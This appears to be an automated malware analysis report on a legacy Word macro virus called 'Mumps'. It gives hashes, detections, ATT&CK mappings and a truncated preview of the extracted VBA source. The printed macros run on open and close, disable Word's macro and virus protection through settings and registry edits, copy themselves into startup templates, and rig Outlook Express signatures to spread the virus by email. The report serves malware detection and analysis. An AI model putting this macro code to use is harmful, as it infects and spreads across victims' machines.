Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e06dc1507cb0063…

MALICIOUS

Office (OLE)

45.0 KB Created: 2004-02-02 19:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2b69670923285eb6cea5f2d37b9f0984 SHA-1: 1e75d82fae790f93ceb093a79771a9ee94a22a32 SHA-256: 3e06dc1507cb00635c04ed5fafbb404739f8464dcc8d4ff97930a5c4ce56173a
400 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer T1047 WMI

The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions, which are indicative of older malware. The VBA script attempts to disable security features, export a component to C:\Windows\Mumps.drv, and potentially establish persistence by saving a modified template to \Program Files\Microsoft Office\Office\STARTUP\Mumps.dot. The script also attempts to display a fake "low memory resources" error message via Notepad, likely as a distraction. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further supports its malicious nature.

Heuristics 8

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7644 bytes
SHA-256: 90369b16801511054d5e4e7a62e8c0eeae9e637136986be3acf660f5528f99ad
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Mumps"
' Mumps
Sub HelpAbout()
    On Error Resume Next
    Options.BlueScreen = True
    MyAPP = Shell("notepad.exe", 1)
    SendKeys "Windows has low memory resources. Please restart your Windows.....", True
    AppActivate (MyAPP)
End Sub
Sub AutoClose()
    On Error Resume Next
    ' Mumps by Anonymous 01/02
    Dim f1, t1, fs
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Application.DisplayStatusBar = False
    Set fso = CreateObject("Scripting.FileSystemObject")
    Application.ScreenUpdating = False
    Options.SaveNormalPrompt = False
    Application.DisplayAlerts = wdAlertsNone
    ActiveDocument.ReadOnlyRecommended = False
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Anonymous"
    ActiveDocument.VBProject.VBComponents("Mumps").export ("C:\Windows\Mumps.drv")
    SetAttr ("C:\Windows\Mumps.drv"), 6
    Template = Dir("C:\Program Files\Microsoft Office\Office\STARTUP\Mumps.dot")
    If Template = "" Then
    NormalTemplate.OpenAsDocument
    ActiveDocument.VBProject.VBComponents.Import ("C:\Windows\Mumps.drv")
    ActiveDocument.SaveAs ("C:\Program Files\Microsoft Office\Office\STARTUP\Mumps.dot")
    ActiveDocument.SaveAs ("C:\Windows\FAQ.doc")
    NormalTemplate.Saved = True
    ActiveDocument.Close
    End If
    Call MIRC
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\{4A2A00A0-C0FA-11D3-A16B-921B092BE65E}\Software\Microsoft\Outlook Express\5.0\signatures", "Default Signature") = "00000000"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\{4A2A00A0-C0FA-11D3-A16B-921B092BE65E}\Software\Microsoft\Outlook Express\5.0\signatures\00000000", "name") = "Signature #1"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\{4A2A00A0-C0FA-11D3-A16B-921B092BE65E}\Software\Microsoft\Outlook Express\5.0\signatures\00000000", "type") = "2"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\{4A2A00A0-C0FA-11D3-A16B-921B092BE65E}\Software\Microsoft\Outlook Express\5.0\signatures\00000000", "text") = ""
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\{4A2A00A0-C0FA-11D3-A16B-921B092BE65E}\Software\Microsoft\Outlook Express\5.0\signatures\00000000", "file") = "C:\WINDOWS\FAQ.doc"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\{4A2A00A0-C0FA-11D3-A16B-921B092BE65E}\Software\Microsoft\Outlook Express\5.0", "Signature Flags") = "3"
End Sub
Sub AutoOpen()
    On Error Resume Next
    ' Mumps by Anonymous 01/02
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Application.DisplayStatusBar = False
    Application.ScreenUpdating = False
    Options.SaveNormalPrompt = False
    Application.DisplayAlerts = wdAlertsNone
    ActiveDocument.ReadOnlyRecommended = False
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Anonymous"
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\{4A2A00A0-C0FA-11D3-A16B-921B092BE65E}\Software\Microsoft\Outlook Express\5.0\signatures", "Default Signature") = "00000000"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\{4A2A00A0-C0FA-11D3-A16B-921B092BE65E}\Software\Microsoft\Outlook Express\5.0\signatures\00000000", "name") = "Signature #1"
    System.PrivateProfileString
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.